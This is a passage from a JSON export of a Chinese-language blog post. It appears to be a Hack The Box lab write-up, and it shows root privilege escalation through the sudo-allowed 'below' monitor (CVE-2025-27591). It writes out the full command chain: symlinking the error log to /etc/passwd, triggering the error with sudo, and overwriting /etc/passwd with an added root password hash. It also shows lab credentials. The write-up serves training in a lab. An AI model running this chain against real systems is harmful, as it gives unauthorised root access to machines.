\/><\/p>\n<p>\u53d1\u73b0\u8be5\u7a0b\u5e8f\u4e3a\u4e00\u4e2a\u5bf9\u64cd\u4f5c\u7cfb\u7edf\u8fdb\u7a0b\u548c\u4f7f\u7528\u72b6\u6001\u8fdb\u884c\u5b9e\u65f6\u76d1\u63a7\u548c\u8bb0\u5f55\u7684\u5de5\u5177\u3002\u5c1d\u8bd5\u641c\u7d22<code>GitHub<\/code>\uff0c\u53d1\u73b0\u4e86\u8be5\u7a0b\u5e8f\u7684\u9879\u76ee\u5730\u5740\uff1a<a href=\"https:\/\/github.com\/facebookincubator\/below\" target=\"_blank\"  rel=\"nofollow\" >GitHub - facebookincubator\/below: A time traveling resource monitor for modern Linux systems<\/a><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1752892026756-fea7300e-caf3-4963-b137-a34c0428c32d.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0<code>Security<\/code>\u9875\u9762\u5b58\u5728\u4e00\u6761\u8bb0\u5f55\uff0c\u70b9\u51fb\u67e5\u770b\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1752892100019-a1af46e8-f1bd-4bc6-ba86-4df89a0740e8.png\" alt=\"\" \/><\/p>\n<p>\u6210\u529f\u53d1\u73b0\u9776\u673a<code>Sudo<\/code>\u6743\u9650\u7a0b\u5e8f<code>below<\/code>\u5b58\u5728\u6743\u9650\u63d0\u5347\u6f0f\u6d1e\uff0c\u7f16\u53f7\u4e3a<code>CVE-2025-27591<\/code>\uff01\u901a\u8fc7\u8054\u7f51\u67e5\u627e\uff0c\u6210\u529f\u627e\u5230\u4e86\u6f0f\u6d1e\u5229\u7528\u811a\u672c\uff1a<a href=\"https:\/\/github.com\/obamalaolu\/CVE-2025-27591\/blob\/main\/CVE-2025-27591.sh\" target=\"_blank\"  rel=\"nofollow\" >CVE-2025-27591\/CVE-2025-27591.sh at main \u00b7 obamalaolu\/CVE-2025-27591 \u00b7 GitHub<\/a><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1752892535633-4e297eb1-1810-45a6-98de-af223e9a4358.png\" alt=\"\" \/><\/p>\n<p>\u901a\u8bfb\u4ee3\u7801\uff0c\u53d1\u73b0\u6f0f\u6d1e\u539f\u7406\u5982\u4e0b\uff1a<\/p>\n<ol>\n<li><code>below<\/code>\u7a0b\u5e8f\u7684\u65e5\u5fd7\u8f93\u51fa\u76ee\u5f55<code>\/var\/log\/below\/<\/code>\u5c5e\u4e3b\u4e3a<code>root<\/code>\uff0c\u4f46\u6743\u9650\u5374\u4e3a<code>777<\/code>\uff0c\u8fd9\u5bfc\u81f4\u4efb\u4f55\u7528\u6237\u90fd\u53ef\u4ee5\u5728\u76ee\u5f55\u5185\u5220\u9664\u548c\u521b\u5efa\u6587\u4ef6\uff0c\u5305\u62ec\u6307\u5411\u7cfb\u7edf\u5173\u952e\u6587\u4ef6\u7684\u8f6f\u94fe\u63a5\uff1b<\/li>\n<li>\u5728\u7528\u6237\u4f7f\u7528<code>below<\/code>\u7684<code>replay<\/code>\u529f\u80fd\uff0c\u4f46\u6307\u5b9a\u4e86\u9519\u8bef\u7684\u65f6\u95f4\u65f6\uff0c\u7a0b\u5e8f\u4f1a\u5c06\u9519\u8bef\u4fe1\u606f\u8f93\u51fa\u5230<code>\/var\/log\/below\/error_&lt;\u7528\u6237\u540d&gt;.log<\/code>\u6587\u4ef6\u4e2d\uff0c\u5e76\u5728\u8f93\u51fa\u524d\u5c06\u6587\u4ef6\u6743\u9650\u8bbe\u7f6e\u4e3a<code>666<\/code>\u3002\u5982\u679c\u8be5\u65e5\u5fd7\u6587\u4ef6\u88ab\u8bbe\u7f6e\u4e3a\u4e86\u6307\u5411<code>\/etc\/passwd<\/code>\u6587\u4ef6\u7684\u8f6f\u94fe\u63a5\uff0c\u5219<code>passwd<\/code>\u6587\u4ef6\u5c31\u4f1a\u88ab\u8bbe\u4e3a\u4efb\u610f\u7528\u6237\u53ef\u5199\uff0c\u5e76\u88ab\u5199\u5165\u65e5\u5fd7\u6570\u636e\uff1b<\/li>\n<li>\u5f53<code>passwd<\/code>\u88ab\u8bbe\u4e3a\u4efb\u610f\u7528\u6237\u53ef\u5199\u540e\uff0c\u6211\u4eec\u5c31\u53ef\u4ee5\u5411\u6587\u4ef6\u5185\u5199\u5165\u81ea\u5b9a\u4e49\u7cfb\u7edf\u7528\u6237\u53ca\u5bc6\u7801\u6570\u636e\uff0c\u4ece\u800c\u5b9e\u73b0\u63d0\u6743\u3002<\/li>\n<\/ol>\n<p>\u4e0b\u9762\u8fdb\u884c\u5229\u7528\u3002\u9996\u5148\u786e\u5b9a<code>\/var\/log\/below\/<\/code>\u76ee\u5f55\u53ef\u5199\uff1a<\/p>\n<pre><code class=\"language-shell\">ls -lA \/var\/log | grep below<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1752893153938-52206c07-8a62-4505-8451-5abe7d4033a1.png\" alt=\"\" \/><\/p>\n<p>\u968f\u540e\uff0c\u67e5\u770b\u76ee\u5f55\u5185\u6587\u4ef6\uff0c\u5e76\u5220\u9664<code>error_root.log<\/code>\u6587\u4ef6\uff0c\u5efa\u7acb\u4e00\u4e2a\u540d\u79f0\u76f8\u540c\uff0c\u4e14\u94fe\u63a5\u76ee\u6807\u4e3a<code>\/etc\/passwd<\/code>\u6587\u4ef6\u7684\u8f6f\u94fe\u63a5\uff1a<\/p>\n<pre><code class=\"language-shell\">cd \/var\/log\/below &amp;&amp; ls -lA\nrm -rf error_root.log\nln -sf \/etc\/passwd \/var\/log\/below\/error_root.log<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1752893343624-4ae6c37c-bdea-478d-89ac-fdeb562a929f.png\" alt=\"\" \/><\/p>\n<p>\u5efa\u7acb\u6210\u529f\u540e\uff0c\u5c06<code>passwd<\/code>\u6587\u4ef6\u5907\u4efd\u5230<code>\/tmp<\/code>\u76ee\u5f55\u4e0b\uff0c\u5411\u6587\u4ef6\u5185\u6dfb\u52a0<code>root<\/code>\u7528\u6237\u5bc6\u7801\uff1a\uff08\u5bc6\u7801\u54c8\u5e0c\u4f7f\u7528<code>openssl<\/code>\u751f\u6210\uff09<\/p>\n<pre><code class=\"language-shell\">cp \/etc\/passwd \/tmp\/evil_passwd\nopenssl passwd -6 Asd310056\nnano \/tmp\/evil_passwd<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1752893567697-e37c6cdd-41e8-46d2-80e6-0238488cf335.png\" alt=\"\" \/><\/p>\n<p>\u63a5\u7740\uff0c\u4f7f\u7528<code>sudo<\/code>\u8fd0\u884c<code>below<\/code>\u547d\u4ee4\uff0c\u89e6\u53d1\u62a5\u9519\u65e5\u5fd7\u8bb0\u5f55\uff0c\u4fee\u6539<code>\/etc\/passwd<\/code>\u6743\u9650\uff1a<\/p>\n<pre><code class=\"language-shell\">sudo below replay --time \"invalid\"<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1752893748256-739ff92a-fa21-4a55-994d-c090a66860f8.png\" alt=\"\" \/><\/p>\n<p>\u4fee\u6539\u6743\u9650\u6210\u529f\uff01\u76f4\u63a5\u5c06\u6076\u610f\u5bc6\u7801\u6587\u4ef6<code>\/tmp\/evil_passwd<\/code>\u5185\u5bb9\u8f93\u51fa\u81f3<code>\/etc\/passwd<\/code>\u6587\u4ef6\uff0c\u968f\u540e\u5207\u6362<code>root<\/code>\u7528\u6237\uff1a<\/p>\n<pre><code class=\"language-shell\">cat \/tmp\/evil_passwd &gt; \/etc\/passwd\nsu -<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1752893868958-8d77d521-daa2-4e2d-a2e8-951a051fbdf1.png\" alt=\"\" \/><\/p>\n<p><strong>\u63d0\u6743\u6210\u529f\uff01\uff01\uff01\uff01<\/strong><\/p>\n<h1>\u672c\u6b21\u9776\u673a\u6e17\u900f\u5230\u6b64\u7ed3\u675f<\/h1>\n<hr \/>\n","protected":false},"excerpt":{"rendered":"<p>\u76ee\u6807\u4fe1\u606f IP\u5730\u5740\uff1a10.129.103.139\uff08\u975e\u56fa\u5b9aIP\u5730\u5740\uff09 \u63d0\u4f9b\u51ed\u636e\uff1atyler \/ LhKL1o9Nm3X2 \u4fe1\u606f\u6536\u96c6  &#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_seopress_robots_primary_cat":"","_seopress_titles_title":"","_seopress_titles_desc":"","_seopress_robots_index":"","emotion":"","emotion_color":"","title_style":"","license":"","footnotes":""},"categories":[18,14],"tags":[],"class_list":["post-318","post","type-post","status-publish","format-standard","hentry","category-htb_season_8","category-linux_machines"],"_links":{"self":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/318","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/comments?post=318"}],"version-history":[{"count":1,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/318\/revisions"}],"predecessor-version":[{"id":319,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/318\/revisions\/319"}],"wp:attachment":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/media?parent=318"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/categories?post=318"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/tags?post=318"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}